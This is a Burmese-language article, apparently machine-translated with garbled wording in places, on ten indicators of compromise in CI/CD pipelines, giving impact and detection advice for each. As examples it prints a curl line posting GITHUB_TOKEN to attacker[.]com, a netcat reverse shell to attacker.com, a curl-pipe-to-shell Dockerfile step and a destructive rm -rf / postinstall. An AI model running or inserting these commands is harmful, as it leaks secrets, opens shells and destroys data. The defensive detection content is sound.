ညှိနှိုင်းမှု၏ ထိပ်တန်းညွှန်ပြချက် ၁၀ ခု CI/CD Pipelines

မာတိကာ

မဖြစ်မနေဖတ်သင့်သောပို့စ်များ

စိတ်ဝင်စားဖွယ်ကောင်းသော နောက်ဆုံးပို့စ်များ

မိတ်ဆက်- ဆိုက်ဘာလုံခြုံရေးတွင် အားနည်းချက်များ၏ ညွှန်ပြချက်များကား အဘယ်နည်း။

ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များသည် သင့်စနစ် သို့မဟုတ် pipeline တိုက်ခိုက်ခံနေရနိုင်ပါတယ်။ ရိုးရှင်းတဲ့ စကားလုံးတွေနဲ့ ပြောရရင် အပေးအယူ အညွှန်းကိန်းများ တိုက်ခိုက်သူတွေ ချန်ထားခဲ့တဲ့ သဲလွန်စတွေဖြစ်ပြီး ထူးဆန်းတဲ့ လက္ခဏာတွေလိုပါပဲ logins၊ ဖိုင်ပြောင်းလဲမှုများ သို့မဟုတ် ဝှက်ထားသော malware။ IOC ဆိုက်ဘာလုံခြုံရေး၎င်းတို့သည် ရာဇဝတ်မှုဖြစ်ပွားရာနေရာတွင် လက်ဗွေရာများကဲ့သို့ လုပ်ဆောင်ပြီး တစ်စုံတစ်ခု မှားယွင်းနေကြောင်း ရှင်းလင်းသော သက်သေအထောက်အထားကို ပေးပါသည်။ ထို့ကြောင့် ဆော့ဖ်ဝဲရေးသားသူများ မေးမြန်းသည့်အခါ ညှိနှိုင်းမှုရဲ့ ညွှန်ပြချက်တွေက ဘာတွေလဲအဖြေသည် ဆာဗာများ သို့မဟုတ် firewall များအတွက်သာ ကန့်သတ်ထားခြင်းမဟုတ်ဘဲ ခေတ်သစ်တွင် ဝှက်ထားသော အန္တရာယ်များလည်း ပါဝင်သည် CI/CD pipelines.

ဤမြို့ရွာ pipelines, attackers များသည် code ကို ပြောင်းလဲနိုင်သည်၊ malicious dependencies များကို inject လုပ်နိုင်သည် သို့မဟုတ် build steps များကို မသိရှိဘဲ ပြောင်းလဲနိုင်သည်။ သို့သော် လမ်းညွှန်အများစုသည် server များ သို့မဟုတ် network များကိုသာ အာရုံစိုက်နေဆဲဖြစ်သည်။ ရလဒ်အနေဖြင့် software supply chain သည် အလွယ်ကူဆုံးပစ်မှတ်များထဲမှ တစ်ခုဖြစ်လာခဲ့သည်။

ထို့ကြောင့် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကို ရှာဖွေခြင်း CI/CD pipelines သည် မရှိမဖြစ်လိုအပ်ပါသည်။ အထူးသဖြင့် ၎င်းသည် အဖွဲ့များအား malware များကို ပိတ်ဆို့ရန်၊ လျှို့ဝှက်ချက်များကို ကာကွယ်ရန်နှင့် software ပေးပို့မှု၏ အဆင့်တိုင်းကို လုံခြုံစေရန် ကူညီပေးပါသည်။

ညှိနှိုင်းမှု၏ ထိပ်တန်းညွှန်ပြချက် ၁၀ ခု CI/CD Pipelines

အန္တရာယ်ဖြစ်စေသော ညွှန်ပြချက်များကို ရှင်းပြသည့်အခါ စာရင်းအများစုသည် ဆာဗာများ သို့မဟုတ် ကွန်ရက်များကို အာရုံစိုက်ကြသည်။ CI/CD pipelines, attackers များသည် အလွန်ကွဲပြားသော လက်ဗွေရာများကို ချန်ထားခဲ့သည်။ ဤအချက်ပြမှုများကို မှတ်မိခြင်းသည် ကြိုတင်ကာကွယ်မှုအတွက် အရေးကြီးပါသည်။ အောက်တွင် developer နှင့် security engineer တိုင်း စောင့်ကြည့်သင့်သော IOC cybersecurity အနီရောင်အလံ ၁၀ ခု ပါရှိသည်။

၁။ သံသယဖြစ်ဖွယ် မှီခိုမှုပြောင်းလဲမှုများ

ညှိနှိုင်းမှု၏ အဓိကညွှန်ပြချက်များထဲမှ တစ်ခုမှာ pipelines သည် ရုတ်တရက် ထူးဆန်းသော dependency update တစ်ခုဖြစ်သည်။ Attacker များသည် အန္တရာယ်ရှိသော package များကို ထည့်သွင်းရန်အတွက် package manager များတွင် developer များထားရှိသည့် trust ကို အသုံးပြုလေ့ရှိသည်။

ဥပမာအားဖြင့် npm မှာ package.json ကွဲပြားမှု ရုတ်တရက် ပါဝင်နိုင်သည်-

+ "crypto-helper": "^1.0.2" 

ထိုသို့သောပြောင်းလဲမှုများသည် ဘေးကင်းပုံရသော်လည်း build တိုင်းထဲသို့ trojanized code ကို ထိုးသွင်းနိုင်သည်။

သက်ရောက်မှု: ခိုးယူခံရသော build များသည် malware ကို ရင်းမြစ်မှ အမွေဆက်ခံကြသည်။

ရှာဖွေတွေ့ရှိမှု: dependency reviews များကို ပြဋ္ဌာန်းပါ၊ lockfile diffs များကို ခြေရာခံပါ၊ နှင့် package အသစ်များကို အချိန်တိုင်း scan ဖတ်ပါ။

၂။ Build များတွင် ရှုပ်ထွေးနေသော ကုဒ်များ 

Malware ရေးသားသူများသည် သုံးသပ်ချက်များကို ကျော်လွှားရန် ရှုပ်ထွေးမှုများကို အားကိုးကြသည်။ ရလဒ်အနေဖြင့်၊ ဤအန္တရာယ်ဖြစ်စေသော အညွှန်းကိန်းသည် CI/CD pipelines သည် ဖမ်းရအခက်ခဲဆုံးများထဲမှ တစ်ခုဖြစ်နိုင်သည်။ အမှန်စင်စစ်၊ ရှုပ်ထွေးနေသော payload များသည် open source libraries များ သို့မဟုတ် container image များထဲသို့ အသိပေးခြင်းမရှိဘဲ ခိုးဝင်သွားလေ့ရှိသည်။

ဥပမာ:

  • PyPI package တစ်ခုကို အသုံးပြုထားပါတယ် base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • မလိုအပ်သော UPX binary များပါဝင်သော Docker image တစ်ခု။
  • JavaScript မှာ အပြည့်အစုံပါဝင်ပါတယ် \x41\x42 အထောက်အထားခိုးယူသူများထံမှ ပုန်းအောင်းလွတ်မြောက်သည်။

သက်ရောက်မှု: Hidden code သည် build သို့မဟုတ် runtime အတွင်း တိတ်ဆိတ်စွာ လုပ်ဆောင်သောကြောင့် ၎င်းသည် IOC ဆိုက်ဘာလုံခြုံရေးတွင် အရေးကြီးသော အချက်ပြမှုတစ်ခု ဖြစ်စေသည်။
ရှာဖွေတွေ့ရှိမှု: ပေါင်းစပ် SAST encoded သို့မဟုတ် packed code ကို flag လုပ်ရန် malware scanning ဖြင့်။ အထူးသဖြင့်၊ obfuscation ကို နောက်ထပ်စုံစမ်းစစ်ဆေးသင့်သော အနီရောင်အလံတစ်ခုအဖြစ် သဘောထားပါ။

၃။ Git တွင် ဖော်ထုတ်ခံရသော လျှို့ဝှက်ချက်များ- ဂန္ထဝင် IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်

CI/CD pipelines သည် repositories များမှ လျှို့ဝှက်ချက်များကို တိုက်ရိုက်အမွေဆက်ခံလေ့ရှိသည်။ သို့သော်၊ Git မှာ လျှို့ဝှက်ချက်တွေ ပေါ်လာတဲ့အခါ၎င်းတို့သည် “ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်း” ဟူသော မေးခွန်းအတွက် အရှင်းလင်းဆုံး အဖြေများထဲမှ တစ်ခု ဖြစ်လာသည် pipeline"S?" Git တွင် credentials များ ရောက်ရှိသွားသည်နှင့် attackers များသည် ၎င်းတို့ကို အကန့်အသတ်မရှိ exploit လုပ်နိုင်သည်။

ဥပမာ:

  • A .env ပါဝင်သောဖိုင် AWS_SECRET_KEY=.
  • တိုကင်များ ထည့်သွင်းထားသည် config.json.
  • ဖယ်ရှားပြီးနောက်ပင် Git မှတ်တမ်းတွင် လျှို့ဝှက်ချက်များကို မြင်နေရဆဲဖြစ်သည်။

သက်ရောက်မှု: ပေါ်ထွက်နေတဲ့ key တွေက တိုက်ခိုက်သူတွေကို တိုက်ရိုက်ဝင်ရောက်ခွင့်ပေးပါတယ် CI/CD pipelines၊ cloud စနစ်များ သို့မဟုတ် ဒေတာဘေ့စ်များ။ ထို့ကြောင့် ၎င်းသည် ညှိနှိုင်းမှု၏ အန္တရာယ်အရှိဆုံး ညွှန်ပြချက်များထဲမှ တစ်ခုဖြစ်သည်။
ရှာဖွေတွေ့ရှိမှု: အသုံး pre-commit hooks နှင့် လျှို့ဝှက်စကင်ဖတ်ရန်အတွက် CI အလုပ်များ၊ ပေါက်ကြားနေသော သော့များကို ချက်ချင်းရုပ်သိမ်းပါ။ ထို့အပြင်၊ ထိတွေ့မှုကာလများကို လျှော့ချရန် အလိုအလျောက်ပြုပြင်မှုကို ပြဋ္ဌာန်းပါ။

၄။ ခိုးဝှက်ထားသည် Pipeline ဖွဲ့စည်းပုံများ- အားနည်းချက်များ၏ ဖုံးကွယ်ထားသော ညွှန်ပြချက်များ

Pipeline config များသည် တန်ဖိုးမြင့်ပစ်မှတ်များဖြစ်သောကြောင့် တစ်ကြိမ်တည်းသော ပြုပြင်မွမ်းမံမှုသည် လုပ်ငန်းစဉ်တစ်ခုလုံးကို မကြာခဏ ဖျက်ဆီးပစ်လေ့ရှိသည်။။ထို့ကြောင့် လိမ်လည်လှည့်ဖြားမှု pipeline ဖိုင်များသည် ရိုးရာစောင့်ကြည့်ရေးကိရိယာများ ရှားရှားပါးပါးသာ တွေ့ရှိနိုင်သော အဓိက IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်တစ်ခုဖြစ်သည်။

ဥပမာ:

  • GitHub လုပ်ဆောင်ချက်များတွင်-

- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN
  • GitLab မှာ- အန္တရာယ်ရှိတဲ့ အလုပ်တစ်ခုကို ထည့်သွင်းထားပါတယ် .gitlab-ci.yml အရေးကြီးဒေတာများကို စွန့်ပစ်သည်။
  • ဂျန်ကင်းစ်တွင်- sh "nc -e /bin/bash attacker.com 4444".

သက်ရောက်မှု: ဤအတည်မပြုရသေးသော ပြောင်းလဲမှုများသည် သင့်အား ပြောင်းလဲစေသည် pipeline တိုက်ခိုက်သူများအတွက် အမြဲတမ်း backdoor ထဲသို့ ဝင်ရောက်သွားပြီး၊ ၎င်းသည် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်တစ်ခုအဖြစ် ရှင်းရှင်းလင်းလင်း ရေတွက်နိုင်သည်။
ရှာဖွေတွေ့ရှိမှု: လက်မှတ်ရေးထိုးထားသော config များကို ပြဋ္ဌာန်းပါ၊ PR ခွင့်ပြုချက်များ လိုအပ်ပါ၊ နှင့် မမျှော်လင့်ထားသော အလုပ်များကို စောင့်ကြည့်ပါ။ ထို့အပြင်၊ သတ်မှတ်ပါ guardrails ပြောင်းလဲထားသော workflow များကို အလိုအလျောက် ပိတ်ဆို့ပေးသည်။

5. အခွင့်ထူးခံ IaC ပုံသေ 

အခြေခံအဆောက်အအုံ အဓိပ္ပာယ်ဖွင့်ဆိုချက်များ မှားယွင်းစွာ ပြင်ဆင်သတ်မှတ်ခြင်းသည် မကြာခဏ ဖုံးကွယ်ထားသော backdoor များကို ဖန်တီးပေးပါသည်။ ရလဒ်အနေဖြင့်၊ privileged default များသည် IaC တို့သည် IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ် တစ်ခုဖြစ်သည်။

ဥပမာ:

  • Kubernetes ဖြန့်ကျက်ခွင့်ပြုသည့် pods များ privileged: true.
  • Helm ဇယားများသည် ဝန်ဆောင်မှုများကို ဖော်ထုတ်ပြသသည် 0.0.0.0:22.

သက်ရောက်မှု: တိုက်ခိုက်သူများသည် root-level access ရရှိကြသည် သို့မဟုတ် internal service များကို လူသိရှင်ကြား ဖော်ထုတ်ကြသည်။ ထို့ကြောင့် ဤပြဿနာများသည် တိုက်ခိုက်မှုမျက်နှာပြင်ကို သိသိသာသာ ကျယ်ပြန့်စေသည်။
ရှာဖွေတွေ့ရှိမှု: Apply IaC ပေါင်းစည်းခြင်းမပြုမီ အနည်းဆုံးအခွင့်ထူးကို ပြဋ္ဌာန်းရန် စကင်ဖတ်စစ်ဆေးပါ။ ထို့အပြင်၊ ဖွဲ့စည်းမှုတိုင်းကို ပြန်လည်သုံးသပ်ခြင်း၏ တစ်စိတ်တစ်ပိုင်းအဖြစ် သေချာပါစေ။ pipeline.

၆။ ပုံမှန်မဟုတ်သော တည်ဆောက်မှု အပြုအမူများ 

တိုက်ခိုက်သူများသည် မကြာခဏ ပြောင်းလဲလေ့ရှိသည် pipeline အပြုအမူကို မကောင်းသော လုပ်ရပ်များထဲသို့ ချော်လဲစေပါသည်။ တစ်နည်းအားဖြင့်ဆိုရသော် ပုံမှန်မဟုတ်သော တည်ဆောက်မှုလုပ်ဆောင်ချက်သည် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်းဆိုသည့် အရှင်းလင်းဆုံးအဖြေများထဲမှ တစ်ခုဖြစ်သည် CI/CD pipelines.

ဥပမာ:

  • ထူးဆန်းသော domain များသို့ outbound network request များပြုလုပ်နေသော build များ။
  • Node.js ပရောဂျက်တစ်ခုသည် PowerShell ကို ရုတ်တရက် ထုတ်ပေးသည် npm install.
  • build script များတွင် သတ်မှတ်ထားခြင်းမရှိသော binary ကြီးများကို ဒေါင်းလုဒ်လုပ်နေသော CI အလုပ်တစ်ခု။

သက်ရောက်မှု: အားနည်းချက်ရှိသော build များသည် malware ဖြန့်ဖြူးရေးနေရာများအဖြစ် လုပ်ဆောင်နိုင်သည်။ အထူးသဖြင့် ၎င်းတို့သည် အန္တရာယ်ရှိသော payload များကို ဖြန့်ကျက်မှုတိုင်းတွင် ပျံ့နှံ့စေသည်။
ရှာဖွေတွေ့ရှိမှု: မမျှော်လင့်ထားသော လုပ်ငန်းစဉ်များ သို့မဟုတ် ချိတ်ဆက်မှုများ ရှိမရှိ တည်ဆောက်မှုမှတ်တမ်းများကို စောင့်ကြည့်ပါ။ ထို့အပြင်၊ ပုံမှန်မဟုတ်သော အပြုအမူများကို အလံပြရန် ပုံမှန်မဟုတ်သော ထောက်လှမ်းမှုကို ပြင်ဆင်သတ်မှတ်ပါ။

၇။ IOC ဆိုက်ဘာလုံခြုံရေးအန္တရာယ်များအဖြစ် အန္တရာယ်ရှိသော Package Script များ

Package manager များသည် သက်တမ်းစက်ဝန်းကို ပံ့ပိုးပေးသည် hooks တိုက်ခိုက်သူများ အသုံးချသော အားနည်းချက်များ။ ထို့ကြောင့် npm၊ PyPI သို့မဟုတ် Dockerfiles ရှိ အန္တရာယ်ရှိသော script များသည် အန္တရာယ်ကျရောက်မှု၏ အားကောင်းသော ညွှန်ပြချက်များဖြစ်သည်။

ဥပမာ:

  • npm: postinstall script ကို လုပ်ဆောင်နေသည် rm -rf / သို့မဟုတ် C2 သို့ အချက်ပြခြင်း။
  • PyPI: setup.py install လုပ်တဲ့အခါ ဝှက်ထားတဲ့ Python ကုဒ်ကို execute လုပ်ပါ။
  • Docker ဖိုင်: RUN curl attacker.sh | sh.

သက်ရောက်မှု: တိုက်ခိုက်မှုသည် runtime testing မတိုင်မီ installation လုပ်နေစဉ်အတွင်း လုပ်ဆောင်သည်။ ထို့ကြောင့် developer များသည် အချိန်နောက်ကျသွားမှသာ သိရှိနိုင်မည်ဖြစ်သည်။
ရှာဖွေတွေ့ရှိမှု: ထည့်သွင်းမှု script များအတွက် package manifest များကို စကင်ဖတ်ပါ။ ထို့အပြင်၊ အန္တရာယ်ရှိသော အချက်အလက်များကို ကန့်သတ်ပါ။ hooks in CI/CD ထိတွေ့မှုကို လျှော့ချရန် အလုပ်အကိုင်များ။

၈။ မှတ်ပုံတင်ခြင်း အဆိပ်သင့်ခြင်း၏ ညွှန်ပြချက်များ

တိုက်ခိုက်သူများသည် မှတ်ပုံတင်ထားသော ရှေးဟောင်းပစ္စည်းများကို အစားထိုး သို့မဟုတ် ပြုပြင်မွမ်းမံကြပြီး ဤဖြစ်ရပ်များသည် ထောက်ပံ့ရေးကွင်းဆက်တွင် အားနည်းချက်များ၏ ညွှန်ပြချက်များ၏ စာအုပ်ဥပမာများဖြစ်သည်။ pipelines.

ဥပမာ:

  • Docker image tag တစ်ခုသည် trojanized layer ဖြင့် တိတ်တဆိတ် update လုပ်ထားသည်။
  • အတွင်းပိုင်းထုပ်ပိုးမှုကို အဆိပ်ခတ်ထားသော ဗားရှင်းဖြင့် အစားထိုးထားသည်။
  • npm namespace squatting လိုမျိုး lodash-proxy.

သက်ရောက်မှု: registry artifact ကို အသုံးပြုတဲ့ build တိုင်းဟာ အန္တရာယ်ကျရောက်ပါတယ်။ ဒါတင်မကဘဲ၊ အန္တရာယ်ကျရောက်မှုဟာ downstream service တွေဆီကိုပါ ပျံ့နှံ့သွားပါတယ်။
ရှာဖွေတွေ့ရှိမှု: မှတ်ပုံတင်ထားသော အချက်အလက်များအားလုံးကို လက်မှတ်ရေးထိုးခြင်းနှင့် သမာဓိစစ်ဆေးမှုများကို ပြဋ္ဌာန်းပါ။ ထို့အပြင်၊ ရှေးဟောင်းပစ္စည်း၏ မူလအစကို ခြေရာခံပါ SBOM အတည်ပြုချက်။

၉။ IOC အထောက်အထားအဖြစ် ပုံမှန်မဟုတ်သော အသုံးပြုသူလုပ်ဆောင်ချက်

ခိုးယူခံရသောအကောင့်များသည် ပုံမှန်မဟုတ်သော အရိပ်အယောင်များကို အမြဲလိုလို ချန်ထားခဲ့သည်။ ထို့ကြောင့်၊ ပုံမှန်မဟုတ်သော ဆော့ဖ်ဝဲရေးသားသူ အပြုအမူသည် ညှိနှိုင်းမှု၏ ခိုင်မာသော ညွှန်ပြချက်တစ်ခုဖြစ်သည်။

ဥပမာ:

  • Commitဒေသစံတော်ချိန် နံနက် ၃ နာရီတွင် ရွှေ့ဆိုင်းခဲ့သည်။
  • အားလပ်ရက်တွင် အကောင့်များမှ PR အတည်ပြုချက်များ။
  • Pipelineပုံမှန်မဟုတ်သော ကြိမ်နှုန်းဖြင့် လှုံ့ဆော်ပေးပါသည်။

သက်ရောက်မှု: တိုက်ခိုက်သူများသည် ခိုးယူထားသော အထောက်အထားများကို အလွဲသုံးစားပြု၍ မကောင်းသောပြောင်းလဲမှုများကို ထည့်သွင်းကြသည်။ အဆုံးတွင်၊ ခွင့်ပြုချက်မရှိဘဲ commitပုံမှန်လုပ်ငန်းဆောင်တာများနှင့် အလွယ်တကူ ရောနှောနိုင်သည်။
ရှာဖွေတွေ့ရှိမှု: စောငျ့ရှောကျ SCM မူမမှန်မှုများအတွက် လုပ်ဆောင်ခြင်း၊ MFA ကို ပြဋ္ဌာန်းခြင်းနှင့် တိုကင်များကို မှန်မှန်လှည့်ပတ်ခြင်း။ ထို့အပြင်၊ သံသယဖြစ်ဖွယ်ကိစ္စများတွင် သတိပေးချက် commit သို့မဟုတ် အတည်ပြုချက်ပုံစံများ။

၁၀။ IOC ဆိုက်ဘာလုံခြုံရေးတွင် သမာဓိ သို့မဟုတ် လက်မှတ်စစ်ဆေးမှုများ မအောင်မြင်ခဲ့ပါ။

အဖြစ်များပေမယ့် လျစ်လျူရှုထားခံရတဲ့ ညှိနှိုင်းမှု၏ညွှန်ပြချက် သည် မှန်ကန်မှု သို့မဟုတ် လက်မှတ်စစ်ဆေးမှု မအောင်မြင်ပါ။ IOC ဆိုက်ဘာလုံခြုံရေးတွင်၊ ဤစစ်ဆေးမှုများသည် ကုဒ် သို့မဟုတ် artifacts များသည် စစ်မှန်ကြောင်း အတည်ပြုသည်။ ၎င်းတို့ကို ကျော်သွားခြင်းသည် ထွက်ခွာသွားသည်။ pipelineဖော်ထုတ်ခံရသည်။

ဥပမာ:

  • SHA256 hash သည် မျှော်လင့်ထားသော checksum နှင့် မကိုက်ညီပါ။
  • GPG လက်မှတ် ပျောက်ဆုံးနေ သို့မဟုတ် မမှန်ကန်ပါ။
  • An SBOM လက်မှတ်မထိုးထားသော ရှေးဟောင်းပစ္စည်းများကို ပြသထားသည်။

သက်ရောက်မှု: Integrity ချို့ယွင်းမှုများသည် များသောအားဖြင့် ခိုးဝှက်လုပ်ဆောင်ခြင်း၊ registry အဆိပ်သင့်ခြင်း သို့မဟုတ် malware ထိုးသွင်းခြင်းတို့ကို ဆိုလိုပါသည်။

ရှာဖွေတွေ့ရှိမှု: လက်မှတ်စစ်ဆေးမှုများကို အလိုအလျောက်လုပ်ဆောင်ပါ၊ checksum အတည်ပြုချက်ကို ပြဋ္ဌာန်းပါ၊ လက်မှတ်မထိုးထားသော အစိတ်အပိုင်းများကို ပိတ်ဆို့ပါ။ အဓိကအားဖြင့်၊ မအောင်မြင်သော စစ်ဆေးမှုတိုင်းကို ညှိနှိုင်းမှု၏ ရှင်းလင်းသော သက်သေအဖြစ် သဘောထားပါ။

CI/CD တစ်ချက်ကြည့်လိုက်ရုံဖြင့် ညှိနှိုင်းမှု၏ လက္ခဏာများ

ညှိနှိုင်းမှုညွှန်ပြချက် (IOC)သက်ရောက်မှု CI/CD Pipelinesဘယ်လိုထောက်လှမ်းမလဲ။
သံသယဖြစ်ဖွယ် မှီခိုမှုပြောင်းလဲမှုများတိုက်ခိုက်သူများသည် package manager များထဲသို့ malicious libraries များ ထိုးသွင်းပြီး build များကို ခိုးယူခံရစေပါသည်။lockfile diffs များကို ခြေရာခံပါ၊ dependency reviews များကို ပြဋ္ဌာန်းပါ၊ နှင့် dependencies များကို စဉ်ဆက်မပြတ် scan ဖတ်ပါ။
Build များတွင် ရှုပ်ထွေးနေသော ကုဒ်များဝှက်ထားသော payloads များသည် builds သို့မဟုတ် runtime အတွင်း ထောက်လှမ်းခြင်းမရှိဘဲ လုပ်ဆောင်သည်။အသုံး SAST နှင့် base64၊ hex သို့မဟုတ် packed code pattern များကို flag လုပ်ရန် malware scanning လုပ်ခြင်း။
Git မှာ လျှို့ဝှက်ချက်တွေ ဖော်ထုတ်ခံရပေါက်ကြားလာသော တိုကင်များ သို့မဟုတ် API key များသည် တိုက်ခိုက်သူများအား အရေးကြီးသောစနစ်များသို့ တိုက်ရိုက်ဝင်ရောက်ခွင့်ပေးသည်။Git မှာ လျှို့ဝှက်စကင်န်ဖတ်မှုတွေကို လုပ်ဆောင်ပါ hooks နှင့် ပေါက်ကြားလာသော အထောက်အထားများကို အလိုအလျောက် ရုပ်သိမ်းပါသည်။
ခိုးဝှက်ထားသည် Pipeline configurationsပြုပြင်ထားသော workflow များသည် ဒေတာများကို ထုတ်ယူခြင်း သို့မဟုတ် အတွင်း၌ ကြာရှည်ခံခြင်းကို ခွင့်ပြုသည် CI/CD.PR ခွင့်ပြုချက်များ လိုအပ်ခြင်း၊ လက်မှတ်ရေးထိုးထားသော config များကို ပြဋ္ဌာန်းခြင်းနှင့် စောင့်ကြည့်ခြင်း pipeline အပြောင်းအလဲများကို။
အခွင့်ထူး IaC ပုံသေအလွန်အကျွံခွင့်ပြုထားသော အခန်းကဏ္ဍများ သို့မဟုတ် မလုံခြုံသော မူရင်းများသည် cloud ပတ်ဝန်းကျင်များကို ဖော်ထုတ်ပါသည်။အနည်းဆုံး အခွင့်ထူး ပြဋ္ဌာန်းချက်အတွက် Terraform၊ Kubernetes နှင့် Helm ဖိုင်များကို စကင်ဖတ်ပါ။
ပုံမှန်မဟုတ်သော တည်ဆောက်မှု အပြုအမူများPipelinemalware ဖြန့်ဖြူးရေးနေရာများအဖြစ် သို့မဟုတ် ဘေးတိုက်ရွေ့လျားမှုအတွက် အသုံးပြုသည်။မမျှော်လင့်ထားသော ဒေါင်းလုဒ်များ၊ လုပ်ငန်းစဉ်များ သို့မဟုတ် အထွက်ခေါ်ဆိုမှုများအတွက် တည်ဆောက်မှုမှတ်တမ်းများကို ခွဲခြမ်းစိတ်ဖြာပါ။
အန္တရာယ်ရှိသော Package Script များဝှက်ထားသော install မလုပ်မီ/ထည့်သွင်းပြီးနောက် script များသည် runtime testing မတိုင်မီ payload များကို လှုံ့ဆော်ပေးသည်။အန္တရာယ်များသော npm/PyPI script များကို ပိတ်ဆို့ပြီး execution ကို ကန့်သတ်ပါ။ CI/CD အလုပ်အကိုင်အခွင့်အ။
မှတ်ပုံတင်အဆိပ်သင့်ခြင်းTrojanized artifacts များသည် registry ရှိ ယုံကြည်ရသော image များ သို့မဟုတ် binaries များကို အစားထိုးသည်။checksum များကို အတည်ပြုပါ၊ signature validation ကို ပြဋ္ဌာန်းပါ၊ နှင့် registry များကို ကြိုတင်စကင်ဖတ်ပါ။
ပုံမှန်မဟုတ်သော အသုံးပြုသူ လုပ်ဆောင်ချက်ခိုးယူခံရသောအကောင့်များသည် အန္တရာယ်ရှိသော ရည်ရွယ်ချက်ဖြင့် တွန်းအားပေးသည် commits သို့မဟုတ် trigger pipelines.MFA ကို ပြဋ္ဌာန်းပြီး စောင့်ကြည့်ပါ commitပုံမှန်မဟုတ်မှုများအတွက် s များနှင့် ခွဲခြမ်းစိတ်ဖြာပါ login ပုံစံများ။
သမာဓိ သို့မဟုတ် လက်မှတ်စစ်ဆေးမှုများ မအောင်မြင်ခဲ့ပါ။ဝင်ရောက်နေသော ကုဒ်၊ မှီခိုမှုများ သို့မဟုတ် ရုပ်ပုံများကို ညွှန်ပြသည် pipeline.သမာဓိစစ်ဆေးမှုများကို အလိုအလျောက်လုပ်ဆောင်ပြီး လက်မှတ်မထိုးထားသော သို့မဟုတ် မကိုက်ညီသော အစိတ်အပိုင်းများကို ပိတ်ဆို့ပါ။

ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေး ဘာကြောင့် လွဲချော်နေရတာလဲ။ CI/CD အန္တရာယ်များ

အဖွဲ့အစည်းအများစုသည် ဆာဗာများ၊ ကွန်ပျူတာများ သို့မဟုတ် ကွန်ရက်များပေါ်ရှိ အန္တရာယ်ဖြစ်စေသော ညွှန်ပြချက်များကို စောင့်ကြည့်ပြီးဖြစ်သည်။ သို့သော် IOC ဆိုက်ဘာလုံခြုံရေးအတွက် ဤဂန္ထဝင်ချဉ်းကပ်မှုသည် CI/CD pipelines တွေဟာ အခုအချိန်မှာ အရေးအကြီးဆုံး တိုက်ခိုက်မှု မျက်နှာပြင်တွေထဲက တစ်ခုပါ။ တကယ်တော့၊ pipelineရိုးရာကိရိယာများ မသိရှိနိုင်သော ထူးခြားသော ညှိနှိုင်းမှု အချက်ပြမှုများကို ပြသသည်။

ရိုးရာလုံခြုံရေးတွင် ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များ

ရိုးရာ IOC ဆိုက်ဘာလုံခြုံရေးတွင်၊ အဓိကထားလေ့ရှိသည်မှာ-

  • ထူးဆန်းသော logins သို့မဟုတ် ခိုးယူခံရသော အထောက်အထားများကို အကြံပြုသည့် IP လိပ်စာများ။
  • malware ကိုဖော်ပြသည့် သံသယဖြစ်ဖွယ်ဖိုင် hash များ သို့မဟုတ် registry ပြောင်းလဲမှုများ။
  • ဒေတာခိုးယူမှုကို ညွှန်ပြသည့် မမျှော်လင့်ထားသော ထွက်သွားသည့် အသွားအလာ။

၎င်းတို့သည် လူသိများသော အညွှန်းကိန်းများဖြစ်ပြီး ၎င်းတို့တွင်လည်း ခြေရာခံထားသည်- MITER ATT&CK မူဘောင်၊ ၎င်းသည် ရန်သူ၏ အဖြစ်များသော အပြုအမူများနှင့် နည်းဗျူဟာများကို မြေပုံဆွဲပေးသည်။ ၎င်းတို့သည် အသုံးဝင်သော အချက်ပြမှုများဖြစ်သည်။ သို့သော် ၎င်းတို့သည် အဓိကအားဖြင့် လည်ပတ်မှုစနစ်များ သို့မဟုတ် ကော်ပိုရိတ်ကွန်ရက်များနှင့် သက်ဆိုင်သည်။ ရလဒ်အနေဖြင့် ၎င်းတို့သည် ဆော့ဖ်ဝဲလ်ထောက်ပံ့ရေးကွင်းဆက်တွင် အစောပိုင်းတွင် ဖြစ်ပေါ်လေ့ရှိသော သိမ်မွေ့သော ခိုးယူမှုများကို လွတ်သွားစေသည်။

အဘယ်ကြောင့် CI/CD Pipeline၎

CI/CD pipelines များသည် developer များရှိသည့် အလိုအလျောက်ပတ်ဝန်းကျင်များဖြစ်သည် commit code၊ pull dependencies နှင့် release builds များ။ တိုက်ခိုက်သူများသည် ဤနေရာတွင် ညှိနှိုင်းမှုတစ်ခုသည် ဖြန့်ကျက်မှုတိုင်းတွင် အဆင့်ဆင့်ဖြစ်ပေါ်လေ့ရှိကြောင်း သိရှိကြသည်။ ထို့ကြောင့်၊ ညှိနှိုင်းမှု၏ ညွှန်ပြချက်များကား အဘယ်နည်း။ CI/CD pipelines? သူတို့က အရမ်းကွာခြားပုံရတယ်-

  • package.json သို့မဟုတ် requirements.txt တွင် တိတ်တဆိတ်ထည့်သွင်းထားသော အန္တရာယ်ရှိသော မှီခိုမှုတစ်ခု။
  • Git တွင် API key များ သို့မဟုတ် token များ ဖော်ထုတ်ခံရခြင်း commits သို့မဟုတ် .env ဖိုင်များ။
  • ရှုပ်ထွေးနေသော ကုဒ်ကို npm သို့မဟုတ် PyPI package များထဲသို့ ထိုးသွင်းထားသည်။
  • Terraform သို့မဟုတ် Kubernetes ဖိုင်များသည် privileged: true ကဲ့သို့သော မလုံခြုံသော default များပါရှိသည်။
  • Pipeline ဒေတာများကို ထုတ်ယူရန် သို့မဟုတ် backdoor များကို ဖွင့်ရန် တည်းဖြတ်ထားသော အလုပ်များ။

ဤအပေးအယူလုပ်မှု လက္ခဏာများ CI/CD မမြင်ရအောင်နေ standard လုံခြုံရေးကိရိယာများ။

IOC ဆိုက်ဘာလုံခြုံရေးတွင် ကွာဟချက်

